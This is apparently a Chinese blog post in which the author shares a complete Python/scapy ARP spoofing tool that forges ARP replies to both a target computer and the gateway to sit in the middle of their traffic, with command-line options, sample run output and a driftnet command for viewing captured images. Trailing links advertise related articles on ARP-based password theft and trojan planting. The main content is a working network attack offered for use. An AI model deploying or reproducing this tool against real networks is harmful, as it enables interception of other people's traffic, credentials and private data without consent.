刚学习了scapy模块的一些用法,非常强大,为了练手,利用此模块编写了一个arp欺骗工具,其核心是构造arp欺骗包。加了一个-a参数用于进行全网欺骗,先暂不实现。代码如下:

 #--*--coding=utf-8--*--

 from scapy.all import *

 import optparse

 import threading

 #解决在linux系统上运行时报的unicode编码相关错误

 import sys

 reload(sys)

 sys.setdefaultencoding('utf-8')

 def getMac(tgtIP):

     '''

     调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

     '''

     try:

         tgtMac = getmacbyip(tgtIP)

         return tgtMac

     except:

         print '[-]请检查目标IP是否存活' 

 def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):

     '''

     生成ARP数据包,伪造网关欺骗目标计算机

     srcMac:本机的MAC地址,充当中间人

     tgtMac:目标计算机的MAC

     gatewayIP:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

     tgtIP:目标计算机的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)

     return pkt

 def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):

     '''

     生成ARP数据包,伪造目标计算机欺骗网关

     srcMac:本机的MAC地址,充当中间人

     gatewayMac:网关的MAC

     tgtIP:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

     gatewayIP:网关的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)

     return pkt

 def main():

     usage = 'Usage: %prog -t <targetip> -g <gatewayip> -i <interface> -a'

     parser = optparse.OptionParser(usage,version='v1.0')

     parser.add_option('-t',dest='targetIP',type='string',help='指定目标计算机IP')

     parser.add_option('-g',dest='gatewayIP',type='string',help='指定网关IP')

     parser.add_option('-i',dest='interface',type='string',help='指定使用的网卡')

     parser.add_option('-a',dest='allarp',action='store_true',help='是否进行全网arp欺骗')

     options,args = parser.parse_args()

     tgtIP = options.targetIP

     gatewayIP = options.gatewayIP

     interface = options.interface

     if tgtIP == None or gatewayIP == None or interface == None:

         print parser.print_help()

         exit(0)

     srcMac = get_if_hwaddr(interface)

     print '本机MAC地址是:',srcMac

     tgtMac = getMac(tgtIP)

     print '目标计算机MAC地址是:',tgtMac

     gatewayMac = getMac(gatewayIP)

     print '网关MAC地址是:',gatewayMac

     raw_input('按任意键继续:')

     pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)

     pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)

     i = 1

     while True:

         t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':interface})

         t.start()

         t.join()

         print str(i) + ' [*]发送一个计算机ARP欺骗包'

         s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':interface,})

         s.start()

         s.join()

         print str(i) + ' [*]发送一个网关ARP欺骗包'

         i += 1       

 if __name__ == '__main__':

     main()

验证如下:

 # python arpspoof.py -t 192.168.1.28 -g 192.168.1.1 -i wlan0

 WARNING: No route found for IPv6 destination :: (no default route?)

 本机MAC地址是: xxx

 目标计算机MAC地址是:xxx

 网关MAC地址是: xxx

 按任意键继续:

 .

 Sent 1 packets.

 1 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 1 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个网关ARP欺骗包

 ......

#driftnet -i wlan0

用python编写的定向arp欺骗工具的更多相关文章

  1. Python编写类似nmap的扫描工具

    文主要是利用scapy包编写了一个简易扫描工具,支持ARP.ICMP.TCP.UDP发现扫描,支持TCP SYN.UDP端口扫描,如下: usage: python scan.py <-p pi ...

  2. Python编写的Linux邮件发送工具

    之前有用过Linux自带的mail工具来定时发送邮件,但是要装mailx还有配mail.rc,这还比较正常,关键是到了ubantu下这工具用起来真是操蛋,如果哪天其他的unix like操作系统也有需 ...

  3. 用python编写的excel拆分小工具

    from datetime import date,datetime from openpyxl import Workbook from openpyxl import load_workbook ...

  4. Python黑帽编程 3.1 ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  5. Python黑客编程ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  6. 使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息

    ARP欺骗的作用 当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧 当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一 ...

  7. Arp欺骗攻击的另类应用之屌丝泡妞记

    http://www.2cto.com/Article/201210/163974.html   arp欺骗,我想大家都应该知道怎么回事了.不知道的去问度娘...   就不废话了,还是直接上图上教程比 ...

  8. Mac和Linux系统的:Arp欺骗源码

    linux系统, 简化版的ARP欺骗工具 精简版, 没有很多代码, 只要把准备好的数据, 发送给到网卡接口, 利用这个工具, 可以让局域网内的一台计算机暂时掉线: #include <stdio ...

  9. kali系统:局域网arp欺骗, 搞定任意windows计算机

    目的 通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机 准备 kali系统 metaspolit的使用 Arp欺骗工具:bettercap ...

随机推荐

  1. kali-set

    Set 简介 开源的社会工程学利用套件,通常结合metasploit(部分)来使用 更改 /etc/setoolkit下的配置文件 set_config BLEEDING_EDGE="Fal ...

  2. BNUOJ 6727 Bone Collector

    Bone Collector Time Limit: 1000ms Memory Limit: 32768KB   This problem will be judged on HDU. Origin ...

  3. 九度oj 题目1345:XXX定律之画X

    题目描述: 给你一个n,然后让你输出F(n)规则是这样的,F(n)的输出结果是:F(n-1)     F(n-1)       F(n-1) F(n-1)      F(n-1) F(1)的输出结果是 ...

  4. 九度oj 题目1530:最长不重复子串

    题目描述: 最长不重复子串就是从一个字符串中找到一个连续子串,该子串中任何两个字符都不能相同,且该子串的长度是最大的. 输入: 输入包含多个测试用例,每组测试用例输入一行由小写英文字符a,b,c... ...

  5. 九度oj 1480

    题目描述: 一个数的序列bi,当b1 < b2 < ... < bS的时候,我们称这个序列是上升的.对于给定的一个序列(a1, a2, ...,aN),我们可以得到一些上升的子序列( ...

  6. 【Luogu】P3387缩点(Tarjan缩点+深搜DP)

    题没什么好说的,因为是模板题.求值我用的是dfs. 不能直接在原图上dfs,因为原图上有环的话会发生一些滑稽的事情.所以我们要用Tarjan缩点.因为此题点权全为正,所以如果在图上走一个环当然可以全走 ...

  7. [BZOJ3378] [Usaco2004 Open]MooFest 狂欢节(树状数组)

    传送门 开2个树状数组 一个存的是下标,一个存的是数量 细节...看标称吧,懒得说了,好气啊 #include <cstdio> #include <iostream> #in ...

  8. run as maven build时报错

    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is ...

  9. 关于java读取文件IO流学习总结(一)

    IO流的分类: 1.根据流的数据对象来分: 高端流:所有的内存中的流都是高端流,比如:InputStreamReader 低端流:所有的外界设备中的流都是低端流,比如InputStream,Outpu ...

  10. MongoDB数据类型查询与修改

    MongoDB数据类型和对应的代码如下: MongoDB可以根据字段类型进行文档查询: 可以看到,friend集合的文档中,age字段有32位int类型的,也有double类型的.如果需要把doubl ...